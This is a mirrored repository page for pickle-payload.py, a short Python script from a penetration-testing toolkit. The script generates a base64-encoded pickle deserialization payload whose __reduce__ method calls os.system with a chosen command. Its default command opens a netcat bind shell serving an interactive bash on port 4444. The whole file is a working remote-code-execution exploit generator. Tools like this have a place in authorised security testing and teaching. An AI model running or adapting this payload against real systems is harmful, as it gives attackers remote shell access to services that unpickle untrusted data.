1
0
mirror of https://github.com/mgeeky/Penetration-Testing-Tools.git synced 2024-12-23 09:29:46 +01:00
mgeeky-Penetration-Testing-.../web/pickle-payload.py
2018-02-02 22:22:43 +01:00

21 lines
482 B
Python

#!/usr/bin/python
#
# Pickle deserialization RCE payload.
# To be invoked with command to execute at it's first parameter.
# Otherwise, the default one will be used.
#
import cPickle
import os
import sys
import base64
DEFAULT_COMMAND = "netcat -c '/bin/bash -i' -l -p 4444"
COMMAND = sys.argv[1] if len(sys.argv) > 1 else DEFAULT_COMMAND
class PickleRce(object):
def __reduce__(self):
return (os.system,(COMMAND,))
print base64.b64encode(cPickle.dumps(PickleRce()))